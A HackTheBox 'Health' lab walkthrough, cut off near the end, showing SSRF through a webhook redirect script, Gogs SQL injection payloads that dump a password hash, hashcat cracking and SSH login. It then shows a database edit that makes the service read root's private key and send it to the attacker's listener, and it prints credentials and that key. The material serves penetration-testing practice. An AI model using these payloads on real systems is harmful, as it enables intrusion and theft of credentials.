Nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 ──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health] └─$ nmap -sC -sV -T4 -vv -oN nmapresults.txt 10.10 .11 .176 -Pn Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.92 ( https://nmap.org ) at 2022 -09-25 13 :20 CEST NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3 ) scan. Initiating NSE at 13 :20 Completed NSE at 13 :20 , 0.00 s elapsed NSE: Starting runlevel 2 (of 3 ) scan. Initiating NSE at 13 :20 Completed NSE at 13 :20 , 0.00 s elapsed NSE: Starting runlevel 3 (of 3 ) scan. Initiating NSE at 13 :20 Completed NSE at 13 :20 , 0.00 s elapsed Initiating Parallel DNS resolution of 1 host. at 13 :20 Completed Parallel DNS resolution of 1 host. at 13 :20 , 1.05 s elapsed Initiating Connect Scan at 13 :20 Scanning 10.10 .11 .176 [1000 ports] Discovered open port 22 /tcp on 10.10 .11 .176 Discovered open port 80 /tcp on 10.10 .11 .176 Completed Connect Scan at 13 :20 , 2.50 s elapsed (1000 total ports) Initiating Service scan at 13 :20 Scanning 2 services on 10.10 .11 .176 Completed Service scan at 13 :20 , 6.09 s elapsed (2 services on 1 host) NSE: Script scanning 10.10 .11 .176 . NSE: Starting runlevel 1 (of 3 ) scan. Initiating NSE at 13 :20 Completed NSE at 13 :20 , 1.60 s elapsed NSE: Starting runlevel 2 (of 3 ) scan. Initiating NSE at 13 :20 Completed NSE at 13 :20 , 0.11 s elapsed NSE: Starting runlevel 3 (of 3 ) scan. Initiating NSE at 13 :20 Completed NSE at 13 :20 , 0.00 s elapsed Nmap scan report for 10.10 .11 .176 Host is up, received user-set (0.022 s latency). Scanned at 2022 -09-25 13 :20 :46 CEST for 11s Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE REASON VERSION 22 /tcp open ssh syn-ack OpenSSH 7.6 p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0 )| ssh-hostkey: | 2048 32 :b7:f4:d4:2f:45 :d3:30 :ee:12 :3b:03:67 :bb:e6:31 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChNRnKkpENG89qQHjD+2Kt9H7EDTMkQpzin70Rok0geRogbYVckxywChDv3yYhaDWQ9RrsOcWLs3uGzZR9nCfXOE3uTENbSWV5GdCd3wQNmWcSlkTD4dRcZshaAoMjs1bwzhK+cOy3ZU/ywbIXdHvAz3+Xvyz5yoEnboWYdWtBNFniZ7y/mZtA/XN19sCt5PcmeY40YFSuaVy/PUQnozplBVBIN6W5gnSE0Y+3J1MLBUkvf4+5zKvC+WLqA394Y1M+/UcVcPAjo6maik1JZNAmquWWo+y+28PdXSm9F2p2HAvwJjXc96f+Fl80+P4j1yxrhWC5AZM8fNCX8FjD7Jl7 | 256 86 :e1:5d:8c:29 :39 :ac:d7:e8:15 :e6:49 :e2:35 :ed:0c (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOR0vwVJwhe/5A7dkomT/li2XC2nvv6/4J6Oe8Xeyi/YQspx3RQGz3aG1sWTPstLu7yno0Z+Lk/GotRdyivSdLA= | 256 ef:6b:ad:64 :d5:e4:5b:3e:66 :79 :49 :f4:ec:4c:23 :9f (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINgiR3y8U+HenhKVoN1EFipbmC6EjO3fWwWPUqa8EeJh 80 /tcp open http syn-ack Apache httpd 2.4 .29 ((Ubuntu))|_http-server-header: Apache/2.4 .29 (Ubuntu) |_http-title: HTTP Monitoring Tool |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E | http-methods: |_ Supported Methods: GET HEAD OPTIONS 3000 /tcp filtered ppp no-responseService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3 ) scan. Initiating NSE at 13 :20 Completed NSE at 13 :20 , 0.00 s elapsed NSE: Starting runlevel 2 (of 3 ) scan. Initiating NSE at 13 :20 Completed NSE at 13 :20 , 0.00 s elapsed NSE: Starting runlevel 3 (of 3 ) scan. Initiating NSE at 13 :20 Completed NSE at 13 :20 , 0.00 s elapsed Read data files from : /usr/bin /../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds Segmentation fault
Webserver port 80 When accessing te webserver trough a browser we see:
This is a free utility that allows you to remotely check whether an http service is available trough a webhook . What is a webhook? A webhook can be thought of as a type of API that is driven by events rather than requests .
Because we can specify a Payload URL and a Monitored URL, we can both start a webserver and redirect the incoming traffic to it’s own localhost on port 3000. Then we will setup a listener to see what the returned request is and hopefully see what is behind port 3000 on our target.
Python webserver script for redirecting incoming trafic:
1 2 3 4 5 6 7 8 9 10 11 import sysfrom http.server import HTTPServer, BaseHTTPRequestHandlerclass Redirect (BaseHTTPRequestHandler ): def do_GET (self ): self .send_response(302 ) self .send_header('Location' , sys.argv[1 ]) self .end_headers() HTTPServer(("0.0.0.0" , 80 ), Redirect).serve_forever()
Netcat listener:
Running the redirect script with the remote target:
1 2 ┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health] └─$ sudo python3 redirect.py **http://127.0 .0 .1 :3000 /**
Testing the webhook:
Netcat got the following answer from the service running on port 3000:
1 2 3 4 {"webhookUrl" :"http:\/\/10.10.14.159:4444\/" ,"monitoredUrl" :"http:\/\/10.10.14.159\/" ,"health" :"up" ,"body" :"<!DOCTYPE html>\n<html>\n\t<head data-suburl=\"\">\n\t\t<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\" \/>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\"\/>\n <meta name=\"author\" content=\"Gogs - Go Git Service\" \/>\n\t\t<meta name=\"description\" content=\"Gogs(Go Git Service) a painless self-hosted Git Service written in Go\" \/>\n\t\t<meta name=\"keywords\" content=\"go, git, self-hosted, gogs\">\n\t\t<meta name=\"_csrf\" content=\"HTmxOebCrhkrwLxEz9EAucukVe86MTY2NDMwMDEyNzc3MzUyNTQwNA==\" \/>\n\t\t\n\n\t\t<link rel=\"shortcut icon\" href=\"\/img\/favicon.png\" \/>\n\n\t\t\n\t\t<link rel=\"stylesheet\" href=\"\/\/maxcdn.bootstrapcdn.com\/font-awesome\/4.2.0\/css\/font-awesome.min.css\">\n\n\t\t<script src=\"\/\/code.jquery.com\/jquery-1.11.1.min.js\"><\/script>\n\t\t\n\t\t\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/ui.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/gogs.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/tipsy.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/css\/magnific-popup.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/ng\/fonts\/octicons.css\">\n\t\t<link rel=\"stylesheet\" href=\"\/css\/github.min.css\">\n\n\t\t\n \t<script src=\"\/ng\/js\/lib\/lib.js\"><\/script>\n \t<script src=\"\/ng\/js\/lib\/jquery.tipsy.js\"><\/script>\n \t<script src=\"\/ng\/js\/lib\/jquery.magnific-popup.min.js\"><\/script>\n <script src=\"\/ng\/js\/utils\/tabs.js\"><\/script>\n <script src=\"\/ng\/js\/utils\/preview.js\"><\/script>\n\t\t<script src=\"\/ng\/js\/gogs.js\"><\/script>\n\n\t\t<title>Gogs: Go Git Service<\/title>\n\t<\/head>\n\t<body>\n\t\t<div id=\"wrapper\">\n\t\t<noscript>Please enable JavaScript in your browser!<\/noscript>\n\n<header id=\"header\">\n <ul class=\"menu menu-line container\" id=\"header-nav\">\n \n\n \n \n <li class=\"right\" id=\"header-nav-help\">\n <a target=\"_blank\" href=\"http:\/\/**gogs.io**\/docs\"><i class=\"octicon octicon-info\"><\/i> Help<\/a>\n <\/li>\n <li class=\"right\" id=\"header-nav-explore\">\n <a href=\"\/explore\"><i class=\"octicon octicon-globe\"><\/i> Explore<\/a>\n <\/li>\n \n \n <\/ul>\n<\/header>\n<div id=\"promo-wrapper\">\n <div class=\"container clear\">\n <div id=\"promo-logo\" class=\"left\">\n <img src=\"\/img\/gogs-lg.png\" alt=\"logo\" \/>\n <\/div>\n <div id=\"promo-content\">\n <h1>Gogs<\/h1>\n <h2>A painless self-hosted Git service written in Go<\/h2>\n <form id=\"promo-form\" action=\"\/user\/login\" method=\"post\">\n <input type=\"hidden\" name=\"_csrf\" value=\"HTmxOebCrhkrwLxEz9EAucukVe86MTY2NDMwMDEyNzc3MzUyNTQwNA==\">\n <input class=\"ipt ipt-large\" id=\"username\" name=\"uname\" type=\"text\" placeholder=\"Username or E-mail\"\/>\n <input class=\"ipt ipt-large\" name=\"password\" type=\"password\" placeholder=\"Password\"\/>\n <input name=\"from\" type=\"hidden\" value=\"home\">\n <button class=\"btn btn-black btn-large\">Sign In<\/button>\n <button class=\"btn btn-green btn-large\" id=\"register-button\">Register<\/button>\n <\/form>\n <div id=\"promo-social\" class=\"social-buttons\">\n \n\n\n\n <\/div>\n <\/div> \n <\/div>\n<\/div>\n<div id=\"feature-wrapper\">\n <div class=\"container clear\">\n \n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-flame\"><\/i>\n <b>Easy to install<\/b>\n <p>Simply <a target=\"_blank\" href=\"http:\/\/gogs.io\/docs\/installation\/install_from_binary.html\">run the binary<\/a> for your platform. Or ship Gogs with <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\/tree\/master\/dockerfiles\">Docker<\/a> or <a target=\"_blank\" href=\"https:\/\/github.com\/geerlingguy\/ansible-vagrant-examples\/tree\/master\/gogs\">Vagrant<\/a>, or get it <a target=\"_blank\" href=\"http:\/\/gogs.io\/docs\/installation\/install_from_packages.html\">packaged<\/a>.<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-device-desktop\"><\/i>\n <b>Cross-platform<\/b>\n <p>Gogs runs anywhere <a target=\"_blank\" href=\"http:\/\/golang.org\/\">Go<\/a> can compile for: Windows, Mac OS X, Linux, ARM, etc. Choose the one you love!<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-rocket\"><\/i>\n <b>Lightweight<\/b>\n <p>Gogs has low minimal requirements and can run on an inexpensive Raspberry Pi. Save your machine energy!<\/p>\n <\/div>\n <div class=\"grid-1-2 left\">\n <i class=\"octicon octicon-code\"><\/i>\n <b>Open Source<\/b>\n <p>It's all on <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\/\">GitHub<\/a>! Join us by contributing to make this project even better. Don't be shy to be a contributor!<\/p>\n <\/div>\n \n <\/div>\n<\/div>\n\t\t<\/div>\n\t\t<footer id=\"footer\">\n\t\t <div class=\"container clear\">\n\t\t <p class=\"left\" id=\"footer-rights\">\u00a9 2014 GoGits \u00b7 Version: 0.5.5.1010 Beta \u00b7 Page: <strong>1ms<\/strong> \u00b7\n\t\t Template: <strong>1ms<\/strong><\/p>\n\n\t\t <div class=\"right\" id=\"footer-links\">\n\t\t <a target=\"_blank\" href=\"https:\/\/github.com\/gogits\/gogs\"><i class=\"fa fa-github-square\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"https:\/\/twitter.com\/gogitservice\"><i class=\"fa fa-twitter\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"https:\/\/plus.google.com\/communities\/115599856376145964459\"><i class=\"fa fa-google-plus\"><\/i><\/a>\n\t\t <a target=\"_blank\" href=\"http:\/\/weibo.com\/gogschina\"><i class=\"fa fa-weibo\"><\/i><\/a>\n\t\t <div id=\"footer-lang\" class=\"inline drop drop-top\">Language\n\t\t <div class=\"drop-down\">\n\t\t <ul class=\"menu menu-vertical switching-list\">\n\t\t \t\n\t\t <li><a href=\"#\">English<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=zh-CN\">\u7b80\u4f53\u4e2d\u6587<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=zh-HK\">\u7e41\u9ad4\u4e2d\u6587<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=de-DE\">Deutsch<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=fr-CA\">Fran\u00e7ais<\/a><\/li>\n\t\t \n\t\t <li><a href=\"\/?lang=nl-NL\">Nederlands<\/a><\/li>\n\t\t \n\t\t <\/ul>\n\t\t <\/div>\n\t\t <\/div>\n\t\t <a target=\"_blank\" href=\"http:\/\/gogs.io\">Website<\/a>\n\t\t <span class=\"version\">Go1.3.2<\/span>\n\t\t <\/div>\n\t\t <\/div>\n\t\t<\/footer>\n\t<\/body>\n<\/html>" ,"message" :"HTTP\/1.0 302 Found" ,"headers" :{"Server" :"BaseHTTP\/0.6 Python\/3.10.7" ,"Date" :"Tue, 27 Sep 2022 17:35:27 GMT" ,"Location" :"http:\/\/127.0.0.1:3000\/" ,"Content-Type" :"text\/html; charset=UTF-8" ,"Set-Cookie" :"_csrf=; Path=\/; Max-Age=0" }}
Well, look at that. It looks like gogs is installed on port 3000. I searched online and with searchsploit for exploit against gogs :
1 2 3 4 5 6 7 8 ┌──(kali㉿DESKTOP-FQ305P5)-[~] └─$ searchsploit Gogs ---------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Gogs - 'label' SQL Injection | multiple/webapps/35237. txt Gogs - 'users' /'repos' '?q' SQL Injection | multiple/webapps/35238. txt ---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
It looks like it is vulnerable to SQL Injection: https://www.exploit-db.com/exploits/3523 8
Finding credentials with SQL Injection Time to exploit this vulnerability by using the same method as before, but with SQL Injection inside the redirect request:
1 sudo python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"
Data:
1 "{\"data\":[{\"username\":\"susanne\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}
It looks like some kind of hash, lets also get the salt of the hash:
1 sudo python3 redirect.py "http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/salt/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 { "webhookUrl" : "http:\/\/10.10.14.159:4444\/" , "monitoredUrl" : "http:\/\/10.10.14.159\/" , "health" : "up" , "body" : "{\"data\":[{\"username\":\"susanne\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/c11d48f16f254e918744183ef7b89fce\"},{\"username\":\"sO3XIbeW14\",\"avatar\":\"\/\/1.gravatar.com\/avatar\/1\"}],\"ok\":true}" , "message" : "HTTP\/1.0 302 Found" , "headers" : { "Server" : "BaseHTTP\/0.6 Python\/3.10.7" , "Date" : "Tue, 27 Sep 2022 17:46:18 GMT" , "Location" : "http:\/\/127.0.0.1:3000\/api\/v1\/users\/search?q=')\/**\/union\/**\/all\/**\/select\/**\/1,1,(select\/**\/salt\/**\/from\/**\/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--" , "Content-Type" : "application\/json; charset=UTF-8" , "Set-Cookie" : "_csrf=; Path=\/; Max-Age=0" , "Content-Length" : "174" } }
Salt: sO3XIbeW14
Hash: sO3XIbeW14:66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37
Finding hash algorithm that gogs.io uses and cracking it I had no idea what type of hash I was looking at, so I googled some terms like “gogs.io hashing” and “gogs.io SHA” and I found some articles talking about SHA256: https://github.com/gogs/gogs/issues/4269 . So let’s try to format our hash to SHA256 and try to crack it. I also found this repo: https://github.com/kxcode/KrackerGo Which states that Gogs is using PBKDF2 SHA256. So let’s try that first.
The format for hashcat (10900 ):
1 10900 PBKDF2-HMAC-SHA256 sha256:1000 :MTc3MTA0MTQwMjQxNzY=:PYjCU215Mi57AYPKva9j7mvF4Rc5bCnt
First we got to format the hash into the hashcat format before we can crack it:
1 2 3 ┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health] └─$ echo 'sha256:10000:' $(echo 'sO3XIbeW14' | base64 | cut -c1-14 )':' $(echo '66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37' | xxd -r -p | base64) sha256:10000 :c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=
Time to crack the hash with hashcat mode 10900
1 2 ┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health] └─$ hashcat -m 10900 -a 0 sha256:10000 :c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc= ../rockyou.txt
Cracked!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 sha256:10000 :c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=:**february15** Session..........: hashcat Status...........: Cracked Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256) Hash.Target......: sha256:10000 :c08zWEliZVcxNA:ZsB0ZFVFeB8QZPt/0Rd0U9u...9 O/jc= Time.Started.....: Tue Sep 27 20 :11 :32 2022 (12 secs) Time.Estimated...: Tue Sep 27 20 :11 :44 2022 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (../rockyou.txt) Guess.Queue......: 1 /1 (100.00 %) Speed. Recovered........: 1 /1 (100.00 %) Digests Progress.........: 73728 /14344384 (0.51 %) Rejected.........: 0 /73728 (0.00 %) Restore.Point....: 70656 /14344384 (0.49 %) Restore.Sub. Candidate.Engine.: Device Generator Candidates. Started: Tue Sep 27 20 :10 :54 2022 Stopped: Tue Sep 27 20 :11 :45 2022
Password : february15
Username: susanne
SSH user susanne The credentials we found from the SQL injection work for SSH.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health] └─$ ssh susanne@10.10 .11 .176 The authenticity of host '10.10.11.176 (10.10.11.176)' can't be established. ED25519 key fingerprint is SHA256:K0WrmjTWDZhl/D/mYbJSv/cBLF1Jnx0T2auXQQDc7/Q. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added ' 10.10 .11 .176 ' (ED25519) to the list of known hosts. susanne@10.10.11.176' s password:Welcome to Ubuntu 18.04 .6 LTS (GNU/Linux 4.15 .0 -191 -generic x86_64) * Documentation: https://help .ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue Sep 27 18 :12 :56 UTC 2022 System load: 0.0 Processes: 177 Usage of /: 68.1 % of 3.84 GB Users logged in : 0 Memory usage: 16 % IP address for eth0: 10.10 .11 .176 Swap usage: 0 % 0 updates can be applied immediately.Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Tue Sep 27 16 :14 :38 2022 from 10.10 .14 .142 susanne@health:~$
PE to Root With linpeas.sh we find some laravel credentials:
1 2 3 4 5 6 DB_CONNECTION=mysql DB_HOST=127.0 .0 .1 DB_PORT=3306 DB_DATABASE=laravel DB_USERNAME=laravel DB_PASSWORD=MYsql_strongestpass@2014 +
Connecting to that database:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 susanne@health:/tmp$ mysql ERROR 1045 (28000 ): Access denied for user 'susanne' @'localhost' (using password: NO) susanne@health:/tmp$ mysql -h localhost -u laravel -p laravel Enter password: Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 42 Server version: 5.7 .39 -0ubuntu0.18 .04 .2 (Ubuntu) Copyright (c) 2000 , 2022 , Oracle and /or its affiliates. Oracle is a registered trademark of Oracle Corporation and /or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help . Type '\c' to clear the current input statement.mysql> SHOW DATABASES; +--------------------+ | Database | +--------------------+ | information_schema | | laravel | +--------------------+ 2 rows in set (0.00 sec)mysql> select * from laravel -> ; ERROR 1146 (42S02): Table 'laravel.laravel' doesn't exist mysql> show TABLES; +------------------------+ | Tables_in_laravel | +------------------------+ | failed_jobs | | migrations | | password_resets | | personal_access_tokens | | tasks | | users | +------------------------+ 6 rows in set (0.00 sec) mysql> select * from users; Empty set (0.00 sec) mysql> select * from laravel.users; Empty set (0.00 sec) mysql> select * from laravels.users; ERROR 1142 (42000): SELECT command denied to user ' laravel'@' localhost' for table ' users' mysql> select * from susers; ERROR 1146 (42S02): Table ' laravel.susers' doesn' t existmysql> select * from users; Empty set (0.00 sec) mysql> select * from tasks; Empty set (0.00 sec) mysql> select * from personal_access_tokens; Empty set (0.00 sec) mysql> select * from password_resets; Empty set (0.00 sec) mysql> select * from failed_jobs; Empty set (0.00 sec) mysql> select * from migrations; +----+-------------------------------------------------------+-------+ | id | migration | batch | +----+-------------------------------------------------------+-------+ | 1 | 2014_10_12_000000_create_users_table | 1 | | 2 | 2014_10_12_100000_create_password_resets_table | 1 | | 3 | 2019_08_19_000000_create_failed_jobs_table | 1 | | 4 | 2019_12_14_000001_create_personal_access_tokens_table | 1 | | 5 | 2022_05_17_093614_create_tasks_table | 1 | +----+-------------------------------------------------------+-------+ 5 rows in set (0.00 sec)mysql> \! sh $ id uid=1000 (susanne) gid=1000 (susanne) groups=1000 (susanne) $
Not anything interesting here, so lets continue with pspy:
1 2 UID=0 PID=2829 | /bin /bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2 >&1 UID=0 PID=2850 | mysql laravel --execute TRUNCATE tasks
I found these two processes to be running very often. Again we see something that has to do with the laravel database. But this time it is executing something (as root ) so we have a foothold here.
So that something has to do with the webhooks on the webhost port 80.
I found this HealthChecker.php file, which included the following code:
1 susanne@health:/var/www/html/app/Http/Controllers$ cat HealthChecker.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 { $json = []; $json['webhookUrl' ] = $webhookUrl; $json['monitoredUrl' ] = $**monitoredUrl**; $res = @file_get_contents($monitoredUrl, false); if ($res) { if ($onlyError) { return $json; } $json['health' ] = "up" ; $json['body' ] = $res; if (isset($http_response_header)) { $headers = []; $json['message' ] = $http_response_header[0 ]; for ($i = 0 ; $i <= count($http_response_header) - 1 ; $i++) { $split = explode(':' , $http_response_header[$i], 2 ); if (count($split) == 2 ) { $headers[trim($split[0 ])] = trim($split[1 ]); } else { error_log("invalid header pair: $http_response_header[$i]\n" ); } }
So, when a webhook task is made within the database table tasks , we will be able to change the monitoredUrl in the database and tell it to execute something that will make us root on the server.
First we create a webhook:
Then we set the $monitoredUrl to a file (root’s private key):
1 2 3 mysql> **update tasks set monitoredUrl='file:///root/.ssh/id_rsa' ;** Query OK, 0 rows affected (0.00 sec) Rows matched: 0 Changed: 0 Warnings: 0
Now, we should see the key in our netcat appear:
1 2 3 4 5 6 { "webhookUrl" : "http:\/\/10.10.14.159\/" , "monitoredUrl" : "file:\/\/\/root\/.ssh\/id_rsa" , "health" : "up" , "body" : "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9\/jG5NPqc2TfW4Nlj9gE\nKScDJTrF0vXYnIy4yUwM4\/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq\nIMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH\/\nKuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL\/XP1hN4B7egzjcV8Rphj6XRE3bhgH\n7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8\nW6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae\nNPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9\nt3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8\/v\/3Jeesznu+RJ+G0ezyUGfi0wpQRoD\nC2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI\/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl\nhnqFXpOWB771WnW9yH7\/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x\/LUyan++D+8\nefiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2\n1bLlZQECgYEA9iT13rdKQ\/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj\nnVhtw6NRFZ1Gfu21kPTCUTK34iX\/p\/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3\nsqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou\nfEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q\n0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ\nzkbVWX3JRDh4vdFOBGB\/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT\nrti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB\nN1ZI4E59+O3Z15VgZ\/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD\nSsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o\n++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp\nUnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR\/xkIP\/Mog1a\nvmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU\n6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC\/cQbPm\nQeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G\n-----END RSA PRIVATE KEY-----\n" }
Now quickly format the key with python :
1 2 3 4 5 key = "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9\/jG5NPqc2TfW4Nlj9gE\nKScDJTrF0vXYnIy4yUwM4\/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq\nIMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH\/\nKuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL\/XP1hN4B7egzjcV8Rphj6XRE3bhgH\n7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8\nW6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae\nNPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9\nt3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8\/v\/3Jeesznu+RJ+G0ezyUGfi0wpQRoD\nC2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI\/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl\nhnqFXpOWB771WnW9yH7\/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x\/LUyan++D+8\nefiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2\n1bLlZQECgYEA9iT13rdKQ\/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj\nnVhtw6NRFZ1Gfu21kPTCUTK34iX\/p\/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3\nsqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5N